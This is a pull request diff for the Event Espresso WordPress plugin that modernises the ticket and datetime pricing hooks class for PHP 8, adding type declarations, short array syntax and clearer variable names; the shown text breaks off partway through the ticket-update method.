### PR TITLE
Fix Unit Tests for PHP 8+

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -18,3 +18,4 @@ languages/
 
 # temporary
 #/assets/dist/
+tests/.phpunit.result.cache

--- a/caffeinated/admin/new/pricing/espresso_events_Pricing_Hooks.class.php
+++ b/caffeinated/admin/new/pricing/espresso_events_Pricing_Hooks.class.php
@@ -502,9 +502,9 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 'TKT_name'        => ! empty($ticket_data['TKT_name']) ? $ticket_data['TKT_name'] : '',
                 'TKT_description' => ! empty($ticket_data['TKT_description'])
                                      && $ticket_data['TKT_description'] !== esc_html__(
-                    'You can modify this description',
-                    'event_espresso'
-                )
+                                         'You can modify this description',
+                                         'event_espresso'
+                                     )
                     ? $ticket_data['TKT_description']
                     : '',
                 'TKT_start_date'  => $ticket_data['TKT_start_date'],

--- a/caffeinated/admin/new/pricing/espresso_events_Pricing_Hooks.class.php
+++ b/caffeinated/admin/new/pricing/espresso_events_Pricing_Hooks.class.php
@@ -858,9 +858,9 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws EE_Error
      */
     protected function _add_prices_to_ticket(
-        $prices = array(),
+        array $prices,
         EE_Ticket $ticket,
-        $new_prices = false,
+        bool $new_prices = false,
         $base_price = false,
         $base_price_id = false
     ) {
@@ -1279,7 +1279,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         $datetime,
         $datetime_tickets = array(),
         $all_tickets = array(),
-        $default
+        $default = false
     ) {
         $template_args = array(
             'dtt_row'                           => $default ? 'DTTNUM' : $datetime_row,
@@ -1348,7 +1348,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         $datetime,
         $ticket,
         $datetime_tickets = array(),
-        $default
+        $default = false
     ) {
         $dtt_tkts = $datetime instanceof EE_Datetime && isset($datetime_tickets[ $datetime->ID() ])
             ? $datetime_tickets[ $datetime->ID() ]
@@ -2028,7 +2028,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         $datetime,
         $ticket,
         $ticket_datetimes = array(),
-        $default
+        $default = false
     ) {
         $tkt_datetimes = $ticket instanceof EE_Ticket && isset($ticket_datetimes[ $ticket->ID() ])
             ? $ticket_datetimes[ $ticket->ID() ]

--- a/caffeinated/admin/new/pricing/espresso_events_Pricing_Hooks.class.php
+++ b/caffeinated/admin/new/pricing/espresso_events_Pricing_Hooks.class.php
@@ -2,6 +2,7 @@
 
 use EventEspresso\core\exceptions\InvalidDataTypeException;
 use EventEspresso\core\exceptions\InvalidInterfaceException;
+use EventEspresso\core\services\loaders\LoaderFactory;
 
 /**
  * espresso_events_Pricing_Hooks
@@ -62,14 +63,9 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         $this->_set_date_time_formats();
         $this->_validate_format_strings();
         $this->_set_scripts_styles();
-        // commented out temporarily until logic is implemented in callback
-        // add_action(
-        //     'AHEE__EE_Admin_Page_CPT__do_extra_autosave_stuff__after_Extend_Events_Admin_Page',
-        //     array($this, 'autosave_handling')
-        // );
         add_filter(
             'FHEE__Events_Admin_Page___insert_update_cpt_item__event_update_callbacks',
-            array($this, 'caf_updates')
+            [$this, 'caf_updates']
         );
     }
 
@@ -80,22 +76,22 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
     protected function _setup_metaboxes()
     {
         // if we were going to add our own metaboxes we'd use the below.
-        $this->_metaboxes = array(
-            0 => array(
-                'page_route' => array('edit', 'create_new'),
-                'func'       => 'pricing_metabox',
+        $this->_metaboxes        = [
+            0 => [
+                'page_route' => ['edit', 'create_new'],
+                'func'       => [$this, 'pricing_metabox'],
                 'label'      => esc_html__('Event Tickets & Datetimes', 'event_espresso'),
                 'priority'   => 'high',
                 'context'    => 'normal',
-            ),
-        );
-        $this->_remove_metaboxes = array(
-            0 => array(
-                'page_route' => array('edit', 'create_new'),
+            ],
+        ];
+        $this->_remove_metaboxes = [
+            0 => [
+                'page_route' => ['edit', 'create_new'],
                 'id'         => 'espresso_event_editor_tickets',
                 'context'    => 'normal',
-            ),
-        );
+            ],
+        ];
     }
 
 
@@ -114,21 +110,16 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
          */
         $this->_date_format_strings = apply_filters(
             'FHEE__espresso_events_Pricing_Hooks___set_hooks_properties__date_format_strings',
-            array(
+            [
                 'date' => 'Y-m-d',
                 'time' => 'h:i a',
-            )
+            ]
         );
         // validate
-        $this->_date_format_strings['date'] = isset($this->_date_format_strings['date'])
-            ? $this->_date_format_strings['date']
-            : null;
-        $this->_date_format_strings['time'] = isset($this->_date_format_strings['time'])
-            ? $this->_date_format_strings['time']
-            : null;
-        $this->_date_time_format = $this->_date_format_strings['date']
-                                   . ' '
-                                   . $this->_date_format_strings['time'];
+        $this->_date_format_strings['date'] = $this->_date_format_strings['date'] ?? '';
+        $this->_date_format_strings['time'] = $this->_date_format_strings['time'] ?? '';
+
+        $this->_date_time_format = $this->_date_format_strings['date'] . ' ' . $this->_date_format_strings['time'];
     }
 
 
@@ -165,10 +156,10 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             );
             $msg .= '</p>';
             EE_Error::add_attention($msg, __FILE__, __FUNCTION__, __LINE__);
-            $this->_date_format_strings = array(
+            $this->_date_format_strings = [
                 'date' => 'Y-m-d',
                 'time' => 'h:i a',
-            );
+            ];
         }
     }
 
@@ -178,28 +169,28 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      */
     protected function _set_scripts_styles()
     {
-        $this->_scripts_styles = array(
-            'registers'   => array(
-                'ee-tickets-datetimes-css' => array(
+        $this->_scripts_styles = [
+            'registers'   => [
+                'ee-tickets-datetimes-css' => [
                     'url'  => PRICING_ASSETS_URL . 'event-tickets-datetimes.css',
                     'type' => 'css',
-                ),
-                'ee-dtt-ticket-metabox'    => array(
+                ],
+                'ee-dtt-ticket-metabox'    => [
                     'url'     => PRICING_ASSETS_URL . 'ee-datetime-ticket-metabox.js',
-                    'depends' => array('ee-datepicker', 'ee-dialog', 'underscore'),
-                ),
-            ),
-            'deregisters' => array(
-                'event-editor-css'       => array('type' => 'css'),
-                'event-datetime-metabox' => array('type' => 'js'),
-            ),
-            'enqueues'    => array(
-                'ee-tickets-datetimes-css' => array('edit', 'create_new'),
-                'ee-dtt-ticket-metabox'    => array('edit', 'create_new'),
-            ),
-            'localize'    => array(
-                'ee-dtt-ticket-metabox' => array(
-                    'DTT_TRASH_BLOCK'       => array(
+                    'depends' => ['ee-datepicker', 'ee-dialog', 'underscore'],
+                ],
+            ],
+            'deregisters' => [
+                'event-editor-css'       => ['type' => 'css'],
+                'event-datetime-metabox' => ['type' => 'js'],
+            ],
+            'enqueues'    => [
+                'ee-tickets-datetimes-css' => ['edit', 'create_new'],
+                'ee-dtt-ticket-metabox'    => ['edit', 'create_new'],
+            ],
+            'localize'    => [
+                'ee-dtt-ticket-metabox' => [
+                    'DTT_TRASH_BLOCK'       => [
                         'main_warning'            => esc_html__(
                             'The Datetime you are attempting to trash is the only datetime selected for the following ticket(s):',
                             'event_espresso'
@@ -208,10 +199,14 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                             'In order to trash this datetime you must first make sure the above ticket(s) are assigned to other datetimes.',
                             'event_espresso'
                         ),
-                        'cancel_button'           => '<button class="button--secondary ee-modal-cancel">'
-                                                     . esc_html__('Cancel', 'event_espresso') . '</button>',
-                        'close_button'            => '<button class="button--secondary ee-modal-cancel">'
-                                                     . esc_html__('Close', 'event_espresso') . '</button>',
+                        'cancel_button'           => '
+                            <button class="button--secondary ee-modal-cancel">
+                                ' . esc_html__('Cancel', 'event_espresso') . '
+                            </button>',
+                        'close_button'            => '
+                            <button class="button--secondary ee-modal-cancel">
+                                ' . esc_html__('Close', 'event_espresso') . '
+                            </button>',
                         'single_warning_from_tkt' => esc_html__(
                             'The Datetime you are attempting to unassign from this ticket is the only remaining datetime for this ticket. Tickets must always have at least one datetime assigned to them.',
                             'event_espresso'
@@ -220,17 +215,21 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                             'The ticket you are attempting to unassign from this datetime cannot be unassigned because the datetime is the only remaining datetime for the ticket.  Tickets must always have at least one datetime assigned to them.',
                             'event_espresso'
                         ),
-                        'dismiss_button'          => '<button class="button--secondary ee-modal-cancel">'
-                                                     . esc_html__('Dismiss', 'event_espresso') . '</button>',
-                    ),
-                    'DTT_ERROR_MSG'         => array(
+                        'dismiss_button'          => '
+                            <button class="button--secondary ee-modal-cancel">
+                                ' . esc_html__('Dismiss', 'event_espresso') . '
+                            </button>',
+                    ],
+                    'DTT_ERROR_MSG'         => [
                         'no_ticket_name' => esc_html__('General Admission', 'event_espresso'),
-                        'dismiss_button' => '<div class="save-cancel-button-container">'
-                                            . '<button class="button--secondary ee-modal-cancel">'
-                                            . esc_html__('Dismiss', 'event_espresso')
-                                            . '</button></div>',
-                    ),
-                    'DTT_OVERSELL_WARNING'  => array(
+                        'dismiss_button' => '
+                            <div class="save-cancel-button-container">
+                                <button class="button--secondary ee-modal-cancel">
+                                    ' . esc_html__('Dismiss', 'event_espresso') . '
+                                </button>
+                            </div>',
+                    ],
+                    'DTT_OVERSELL_WARNING'  => [
                         'datetime_ticket' => esc_html__(
                             'You cannot add this ticket to this datetime because it has a sold amount that is greater than the amount of spots remaining for this datetime.',
                             'event_espresso'
@@ -239,15 +238,15 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                             'You cannot add this datetime to this ticket because the ticket has a sold amount that is greater than the amount of spots remaining on the datetime.',
                             'event_espresso'
                         ),
-                    ),
+                    ],
                     'DTT_CONVERTED_FORMATS' => EEH_DTT_Helper::convert_php_to_js_and_moment_date_formats(
                         $this->_date_format_strings['date'],
                         $this->_date_format_strings['time']
                     ),
-                    'DTT_START_OF_WEEK'     => array('dayValue' => (int) get_option('start_of_week')),
-                ),
-            ),
-        );
+                    'DTT_START_OF_WEEK'     => ['dayValue' => (int) get_option('start_of_week')],
+                ],
+            ],
+        ];
     }
 
 
@@ -255,10 +254,10 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @param array $update_callbacks
      * @return array
      */
-    public function caf_updates(array $update_callbacks)
+    public function caf_updates(array $update_callbacks): array
     {
         unset($update_callbacks['_default_tickets_update']);
-        $update_callbacks['datetime_and_tickets_caf_update'] = array($this, 'datetime_and_tickets_caf_update');
+        $update_callbacks['datetime_and_tickets_caf_update'] = [$this, 'datetime_and_tickets_caf_update'];
         return $update_callbacks;
     }
 
@@ -266,8 +265,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
     /**
      * Handles saving everything related to Tickets (datetimes, tickets, prices)
      *
-     * @param  EE_Event $event The Event object we're attaching data to
-     * @param  array    $data  The request data from the form
+     * @param EE_Event $event The Event object we're attaching data to
+     * @param array    $data  The request data from the form
      * @throws ReflectionException
      * @throws Exception
      * @throws InvalidInterfaceException
@@ -275,7 +274,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws EE_Error
      * @throws InvalidArgumentException
      */
-    public function datetime_and_tickets_caf_update($event, $data)
+    public function datetime_and_tickets_caf_update(EE_Event $event, array $data)
     {
         // first we need to start with datetimes cause they are the "root" items attached to events.
         $saved_datetimes = $this->_update_datetimes($event, $data);
@@ -287,8 +286,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
     /**
      * update event_datetimes
      *
-     * @param  EE_Event $event Event being updated
-     * @param  array    $data  the request data from the form
+     * @param EE_Event $event Event being updated
+     * @param array    $data  the request data from the form
      * @return EE_Datetime[]
      * @throws Exception
      * @throws ReflectionException
@@ -297,11 +296,11 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws InvalidArgumentException
      * @throws EE_Error
      */
-    protected function _update_datetimes($event, $data)
+    protected function _update_datetimes(EE_Event $event, array $data): array
     {
-        $timezone = isset($data['timezone_string']) ? $data['timezone_string'] : null;
-        $saved_dtt_ids = array();
-        $saved_dtt_objs = array();
+        $timezone            = $data['timezone_string'] ?? null;
+        $saved_datetime_ids  = [];
+        $saved_datetime_objs = [];
         if (empty($data['edit_event_datetimes']) || ! is_array($data['edit_event_datetimes'])) {
             throw new InvalidArgumentException(
                 esc_html__(
@@ -312,17 +311,19 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         }
         foreach ($data['edit_event_datetimes'] as $row => $datetime_data) {
             // trim all values to ensure any excess whitespace is removed.
-            $datetime_data = array_map(
+            $datetime_data                = array_map(
                 function ($datetime_data) {
                     return is_array($datetime_data) ? $datetime_data : trim($datetime_data);
                 },
                 $datetime_data
             );
+
             $datetime_data['DTT_EVT_end'] = isset($datetime_data['DTT_EVT_end'])
                                             && ! empty($datetime_data['DTT_EVT_end'])
                 ? $datetime_data['DTT_EVT_end']
                 : $datetime_data['DTT_EVT_start'];
-            $datetime_values = array(
+
+            $datetime_values              = [
                 'DTT_ID'          => ! empty($datetime_data['DTT_ID'])
                     ? $datetime_data['DTT_ID']
                     : null,
@@ -340,34 +341,29 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 'DTT_order'       => ! isset($datetime_data['DTT_order'])
                     ? $row
                     : $datetime_data['DTT_order'],
-            );
+            ];
+
             // if we have an id then let's get existing object first and then set the new values.
             // Otherwise we instantiate a new object for save.
             if (! empty($datetime_data['DTT_ID'])) {
-                $datetime = EE_Registry::instance()
-                                       ->load_model('Datetime', array($timezone))
-                                       ->get_one_by_ID($datetime_data['DTT_ID']);
+                $datetime = EEM_Datetime::instance($timezone)->get_one_by_ID($datetime_data['DTT_ID']);
                 // set date and time format according to what is set in this class.
                 $datetime->set_date_format($this->_date_format_strings['date']);
                 $datetime->set_time_format($this->_date_format_strings['time']);
                 foreach ($datetime_values as $field => $value) {
                     $datetime->set($field, $value);
                 }
-                // make sure the $dtt_id here is saved just in case
+
+                // make sure the $datetime_id here is saved just in case
                 // after the add_relation_to() the autosave replaces it.
                 // We need to do this so we dont' TRASH the parent DTT.
                 // (save the ID for both key and value to avoid duplications)
-                $saved_dtt_ids[ $datetime->ID() ] = $datetime->ID();
+                $saved_datetime_ids[ $datetime->ID() ] = $datetime->ID();
             } else {
-                $datetime = EE_Registry::instance()->load_class(
-                    'Datetime',
-                    array(
-                        $datetime_values,
-                        $timezone,
-                        array($this->_date_format_strings['date'], $this->_date_format_strings['time']),
-                    ),
-                    false,
-                    false
+                $datetime = EE_Datetime::new_instance(
+                    $datetime_values,
+                    $timezone,
+                    [$this->_date_format_strings['date'], $this->_date_format_strings['time']]
                 );
                 foreach ($datetime_values as $field => $value) {
                     $datetime->set($field, $value);
@@ -389,12 +385,12 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 $datetime = EEH_DTT_Helper::date_time_add($datetime, 'DTT_EVT_end', 'days');
                 $datetime->save();
             }
-            // now we have to make sure we add the new DTT_ID to the $saved_dtt_ids array
+            // now we have to make sure we add the new DTT_ID to the $saved_datetime_ids array
             // because it is possible there was a new one created for the autosave.
             // (save the ID for both key and value to avoid duplications)
-            $DTT_ID = $datetime->ID();
-            $saved_dtt_ids[ $DTT_ID ] = $DTT_ID;
-            $saved_dtt_objs[ $row ] = $datetime;
+            $DTT_ID                        = $datetime->ID();
+            $saved_datetime_ids[ $DTT_ID ] = $DTT_ID;
+            $saved_datetime_objs[ $row ]   = $datetime;
             // @todo if ANY of these updates fail then we want the appropriate global error message.
         }
         $event->save();
@@ -402,34 +398,34 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         // Keep in mind that this process will only kick in for datetimes that don't have any DTT_sold on them.
         // So its safe to permanently delete at this point.
         $old_datetimes = explode(',', $data['datetime_IDs']);
-        $old_datetimes = $old_datetimes[0] === '' ? array() : $old_datetimes;
+        $old_datetimes = $old_datetimes[0] === '' ? [] : $old_datetimes;
         if (is_array($old_datetimes)) {
-            $datetimes_to_delete = array_diff($old_datetimes, $saved_dtt_ids);
+            $datetimes_to_delete = array_diff($old_datetimes, $saved_datetime_ids);
             foreach ($datetimes_to_delete as $id) {
                 $id = absint($id);
                 if (empty($id)) {
                     continue;
                 }
-                $dtt_to_remove = EE_Registry::instance()->load_model('Datetime')->get_one_by_ID($id);
-                // remove tkt relationships.
-                $related_tickets = $dtt_to_remove->get_many_related('Ticket');
-                foreach ($related_tickets as $tkt) {
-                    $dtt_to_remove->_remove_relation_to($tkt, 'Ticket');
+                $datetime_to_remove = EE_Registry::instance()->load_model('Datetime')->get_one_by_ID($id);
+                // remove ticket relationships.
+                $related_tickets = $datetime_to_remove->get_many_related('Ticket');
+                foreach ($related_tickets as $ticket) {
+                    $datetime_to_remove->_remove_relation_to($ticket, 'Ticket');
                 }
                 $event->_remove_relation_to($id, 'Datetime');
-                $dtt_to_remove->refresh_cache_of_related_objects();
+                $datetime_to_remove->refresh_cache_of_related_objects();
             }
         }
-        return $saved_dtt_objs;
+        return $saved_datetime_objs;
     }
 
 
     /**
      * update tickets
      *
-     * @param  EE_Event      $event           Event object being updated
-     * @param  EE_Datetime[] $saved_datetimes an array of datetime ids being updated
-     * @param  array         $data            incoming request data
+     * @param EE_Event      $event           Event object being updated
+     * @param EE_Datetime[] $saved_datetimes an array of datetime ids being updated
+     * @param array         $data            incoming request data
      * @return EE_Ticket[]
      * @throws Exception
      * @throws ReflectionException
@@ -438,14 +434,14 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws InvalidArgumentException
      * @throws EE_Error
      */
-    protected function _update_tickets($event, $saved_datetimes, $data)
+    protected function _update_tickets(EE_Event $event, array $saved_datetimes, array $data): array
     {
-        $new_tkt = null;
+        $new_ticket = null;
         // stripslashes because WP filtered the $_POST ($data) array to add slashes
-        $data = stripslashes_deep($data);
-        $timezone = $data['timezone_string'] ?? null;
-        $saved_tickets = array();
-        $old_tickets = isset($data['ticket_IDs']) ? explode(',', $data['ticket_IDs']) : array();
+        $data          = stripslashes_deep($data);
+        $timezone      = $data['timezone_string'] ?? null;
+        $saved_tickets = [];
+        $old_tickets   = isset($data['ticket_IDs']) ? explode(',', $data['ticket_IDs']) : [];
         if (empty($data['edit_tickets']) || ! is_array($data['edit_tickets'])) {
             throw new InvalidArgumentException(
                 esc_html__(
@@ -454,96 +450,94 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 )
             );
         }
-        foreach ($data['edit_tickets'] as $row => $tkt) {
+        foreach ($data['edit_tickets'] as $row => $ticket_data) {
             $update_prices = $create_new_TKT = false;
             // figure out what datetimes were added to the ticket
             // and what datetimes were removed from the ticket in the session.
-            $starting_tkt_dtt_rows = explode(',', $data['starting_ticket_datetime_rows'][ $row ]);
-            $tkt_dtt_rows = explode(',', $data['ticket_datetime_rows'][ $row ]);
-            $datetimes_added = array_diff($tkt_dtt_rows, $starting_tkt_dtt_rows);
-            $datetimes_removed = array_diff($starting_tkt_dtt_rows, $tkt_dtt_rows);
+            $starting_ticket_datetime_rows = explode(',', $data['starting_ticket_datetime_rows'][ $row ]);
+            $ticket_datetime_rows          = explode(',', $data['ticket_datetime_rows'][ $row ]);
+            $datetimes_added               = array_diff($ticket_datetime_rows, $starting_ticket_datetime_rows);
+            $datetimes_removed             = array_diff($starting_ticket_datetime_rows, $ticket_datetime_rows);
             // trim inputs to ensure any excess whitespace is removed.
-            $tkt = array_map(
+            $ticket_data = array_map(
                 function ($ticket_data) {
                     return is_array($ticket_data) ? $ticket_data : trim($ticket_data);
                 },
-                $tkt
+                $ticket_data
             );
             // note we are doing conversions to floats here instead of allowing EE_Money_Field to handle
             // because we're doing calculations prior to using the models.
             // note incoming ['TKT_price'] value is already in standard notation (via js).
-            $ticket_price = isset($tkt['TKT_price'])
-                ? round((float) $tkt['TKT_price'], 3)
+            $ticket_price = isset($ticket_data['TKT_price'])
+                ? round((float) $ticket_data['TKT_price'], 3)
                 : 0;
             // note incoming base price needs converted from localized value.
-            $base_price = isset($tkt['TKT_base_price'])
-                ? EEH_Money::convert_to_float_from_localized_money($tkt['TKT_base_price'])
+            $base_price = isset($ticket_data['TKT_base_price'])
+                ? EEH_Money::convert_to_float_from_localized_money($ticket_data['TKT_base_price'])
                 : 0;
             // if ticket price == 0 and $base_price != 0 then ticket price == base_price
-            $ticket_price = $ticket_price === 0 && $base_price !== 0
+            $ticket_price  = $ticket_price === 0 && $base_price !== 0
                 ? $base_price
                 : $ticket_price;
-            $base_price_id = $tkt['TKT_base_price_ID'] ?? 0;
-            $price_rows = is_array($data['edit_prices']) && isset($data['edit_prices'][ $row ])
+            $base_price_id = $ticket_data['TKT_base_price_ID'] ?? 0;
+            $price_rows    = is_array($data['edit_prices']) && isset($data['edit_prices'][ $row ])
                 ? $data['edit_prices'][ $row ]
-                : array();
-            $now = null;
-            if (empty($tkt['TKT_start_date'])) {
+                : [];
+            $now           = null;
+            if (empty($ticket_data['TKT_start_date'])) {
                 // lets' use now in the set timezone.
-                $now = new DateTime('now', new DateTimeZone($event->get_timezone()));
-                $tkt['TKT_start_date'] = $now->format($this->_date_time_format);
+                $now                           = new DateTime('now', new DateTimeZone($event->get_timezone()));
+                $ticket_data['TKT_start_date'] = $now->format($this->_date_time_format);
             }
-            if (empty($tkt['TKT_end_date'])) {
+            if (empty($ticket_data['TKT_end_date'])) {
                 /**
                  * set the TKT_end_date to the first datetime attached to the ticket.
                  */
-                $first_dtt = $saved_datetimes[ reset($tkt_dtt_rows) ];
-                $tkt['TKT_end_date'] = $first_dtt->start_date_and_time($this->_date_time_format);
+                $first_datetime              = $saved_datetimes[ reset($ticket_datetime_rows) ];
+                $ticket_data['TKT_end_date'] = $first_datetime->start_date_and_time($this->_date_time_format);
             }
-            $TKT_values = array(
-                'TKT_ID'          => ! empty($tkt['TKT_ID']) ? $tkt['TKT_ID'] : null,
-                'TTM_ID'          => ! empty($tkt['TTM_ID']) ? $tkt['TTM_ID'] : 0,
-                'TKT_name'        => ! empty($tkt['TKT_name']) ? $tkt['TKT_name'] : '',
-                'TKT_description' => ! empty($tkt['TKT_description'])
-                                     && $tkt['TKT_description'] !== esc_html__(
-                                         'You can modify this description',
-                                         'event_espresso'
-                                     )
-                    ? $tkt['TKT_description']
+            $TKT_values = [
+                'TKT_ID'          => ! empty($ticket_data['TKT_ID']) ? $ticket_data['TKT_ID'] : null,
+                'TTM_ID'          => ! empty($ticket_data['TTM_ID']) ? $ticket_data['TTM_ID'] : 0,
+                'TKT_name'        => ! empty($ticket_data['TKT_name']) ? $ticket_data['TKT_name'] : '',
+                'TKT_description' => ! empty($ticket_data['TKT_description'])
+                                     && $ticket_data['TKT_description'] !== esc_html__(
+                    'You can modify this description',
+                    'event_espresso'
+                )
+                    ? $ticket_data['TKT_description']
                     : '',
-                'TKT_start_date'  => $tkt['TKT_start_date'],
-                'TKT_end_date'    => $tkt['TKT_end_date'],
-                'TKT_qty'         => ! isset($tkt['TKT_qty']) || $tkt['TKT_qty'] === ''
+                'TKT_start_date'  => $ticket_data['TKT_start_date'],
+                'TKT_end_date'    => $ticket_data['TKT_end_date'],
+                'TKT_qty'         => ! isset($ticket_data['TKT_qty']) || $ticket_data['TKT_qty'] === ''
                     ? EE_INF
-                    : $tkt['TKT_qty'],
-                'TKT_uses'        => ! isset($tkt['TKT_uses']) || $tkt['TKT_uses'] === ''
+                    : $ticket_data['TKT_qty'],
+                'TKT_uses'        => ! isset($ticket_data['TKT_uses']) || $ticket_data['TKT_uses'] === ''
                     ? EE_INF
-                    : $tkt['TKT_uses'],
-                'TKT_min'         => empty($tkt['TKT_min']) ? 0 : $tkt['TKT_min'],
-                'TKT_max'         => empty($tkt['TKT_max']) ? EE_INF : $tkt['TKT_max'],
+                    : $ticket_data['TKT_uses'],
+                'TKT_min'         => empty($ticket_data['TKT_min']) ? 0 : $ticket_data['TKT_min'],
+                'TKT_max'         => empty($ticket_data['TKT_max']) ? EE_INF : $ticket_data['TKT_max'],
                 'TKT_row'         => $row,
-                'TKT_order'       => $tkt['TKT_order'] ?? 0,
-                'TKT_taxable'     => ! empty($tkt['TKT_taxable']) ? 1 : 0,
-                'TKT_required'    => ! empty($tkt['TKT_required']) ? 1 : 0,
+                'TKT_order'       => $ticket_data['TKT_order'] ?? 0,
+                'TKT_taxable'     => ! empty($ticket_data['TKT_taxable']) ? 1 : 0,
+                'TKT_required'    => ! empty($ticket_data['TKT_required']) ? 1 : 0,
                 'TKT_price'       => $ticket_price,
-            );
+            ];
             // if this is a default TKT, then we need to set the TKT_ID to 0 and update accordingly,
             // which means in turn that the prices will become new prices as well.
-            if (isset($tkt['TKT_is_default']) && $tkt['TKT_is_default']) {
-                $TKT_values['TKT_ID'] = 0;
+            if (isset($ticket_data['TKT_is_default']) && $ticket_data['TKT_is_default']) {
+                $TKT_values['TKT_ID']         = 0;
                 $TKT_values['TKT_is_default'] = 0;
-                $update_prices = true;
+                $update_prices                = true;
             }
             // if we have a TKT_ID then we need to get that existing TKT_obj and update it
             // we actually do our saves ahead of doing any add_relations to
             // because its entirely possible that this ticket wasn't removed or added to any datetime in the session
             // but DID have it's items modified.
             // keep in mind that if the TKT has been sold (and we have changed pricing information),
-            // then we won't be updating the tkt but instead a new tkt will be created and the old one archived.
+            // then we won't be updating the ticket but instead a new ticket will be created and the old one archived.
             if (absint($TKT_values['TKT_ID'])) {
-                $ticket = EE_Registry::instance()
-                                     ->load_model('Ticket', array($timezone))
-                                     ->get_one_by_ID($tkt['TKT_ID']);
+                $ticket = EEM_Ticket::instance($timezone)->get_one_by_ID($ticket_data['TKT_ID']);
                 if ($ticket instanceof EE_Ticket) {
                     $ticket = $this->_update_ticket_datetimes(
                         $ticket,
@@ -554,11 +548,11 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                     // are there any registrations using this ticket ?
                     $tickets_sold = $ticket->count_related(
                         'Registration',
-                        array(
-                            array(
-                                'STS_ID' => array('NOT IN', array(EEM_Registration::status_id_incomplete)),
-                            ),
-                        )
+                        [
+                            [
+                                'STS_ID' => ['NOT IN', [EEM_Registration::status_id_incomplete]],
+                            ],
+                        ]
                     );
                     // set ticket formats
                     $ticket->set_date_format($this->_date_format_strings['date']);
@@ -579,7 +573,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                     // if $create_new_TKT is false then we can safely update the existing ticket.
                     // Otherwise we have to create a new ticket.
                     if ($create_new_TKT) {
-                        $new_tkt = $this->_duplicate_ticket(
+                        $new_ticket = $this->_duplicate_ticket(
                             $ticket,
                             $price_rows,
                             $ticket_price,
@@ -593,12 +587,12 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 $ticket = EE_Ticket::new_instance(
                     $TKT_values,
                     $timezone,
-                    array($this->_date_format_strings['date'], $this->_date_format_strings['time'])
+                    [$this->_date_format_strings['date'], $this->_date_format_strings['time']]
                 );
                 if ($ticket instanceof EE_Ticket) {
                     // make sure ticket has an ID of setting relations won't work
                     $ticket->save();
-                    $ticket = $this->_update_ticket_datetimes(
+                    $ticket        = $this->_update_ticket_datetimes(
                         $ticket,
                         $saved_datetimes,
                         $datetimes_added,
@@ -618,7 +612,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             // let's make sure the base price is handled
             $ticket = ! $create_new_TKT
                 ? $this->_add_prices_to_ticket(
-                    array(),
+                    [],
                     $ticket,
                     $update_prices,
                     $base_price,
@@ -631,28 +625,27 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 : $ticket;
             // need to make sue that the TKT_price is accurate after saving the prices.
             $ticket->ensure_TKT_Price_correct();
-            // handle CREATING a default tkt from the incoming tkt but ONLY if this isn't an autosave.
-            if (! defined('DOING_AUTOSAVE') && ! empty($tkt['TKT_is_default_selector'])) {
-                $update_prices = true;
+            // handle CREATING a default ticket from the incoming ticket but ONLY if this isn't an autosave.
+            if (! defined('DOING_AUTOSAVE') && ! empty($ticket_data['TKT_is_default_selector'])) {
                 $new_default = clone $ticket;
                 $new_default->set('TKT_ID', 0);
                 $new_default->set('TKT_is_default', 1);
                 $new_default->set('TKT_row', 1);
                 $new_default->set('TKT_price', $ticket_price);
-                // remove any dtt relations cause we DON'T want dtt relations attached
+                // remove any datetime relations cause we DON'T want datetime relations attached
                 // (note this is just removing the cached relations in the object)
                 $new_default->_remove_relations('Datetime');
                 // @todo we need to add the current attached prices as new prices to the new default ticket.
                 $new_default = $this->_add_prices_to_ticket(
                     $price_rows,
                     $new_default,
-                    $update_prices
+                    true
                 );
                 // don't forget the base price!
                 $new_default = $this->_add_prices_to_ticket(
-                    array(),
+                    [],
                     $new_default,
-                    $update_prices,
+                    true,
                     $base_price,
                     $base_price_id
                 );
@@ -665,34 +658,34 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                     $data
                 );
             }
-            // DO ALL dtt relationships for both current tickets and any archived tickets
-            // for the given dtt that are related to the current ticket.
+            // DO ALL datetime relationships for both current tickets and any archived tickets
+            // for the given datetime that are related to the current ticket.
             // TODO... not sure exactly how we're going to do this considering we don't know
             // what current ticket the archived tickets are related to
             // (and TKT_parent is used for autosaves so that's not a field we can reliably use).
             // let's assign any tickets that have been setup to the saved_tickets tracker
             // save existing TKT
             $ticket->save();
-            if ($create_new_TKT && $new_tkt instanceof EE_Ticket) {
+            if ($create_new_TKT && $new_ticket instanceof EE_Ticket) {
                 // save new TKT
-                $new_tkt->save();
+                $new_ticket->save();
                 // add new ticket to array
-                $saved_tickets[ $new_tkt->ID() ] = $new_tkt;
+                $saved_tickets[ $new_ticket->ID() ] = $new_ticket;
                 do_action(
                     'AHEE__espresso_events_Pricing_Hooks___update_tkts_new_ticket',
-                    $new_tkt,
+                    $new_ticket,
                     $row,
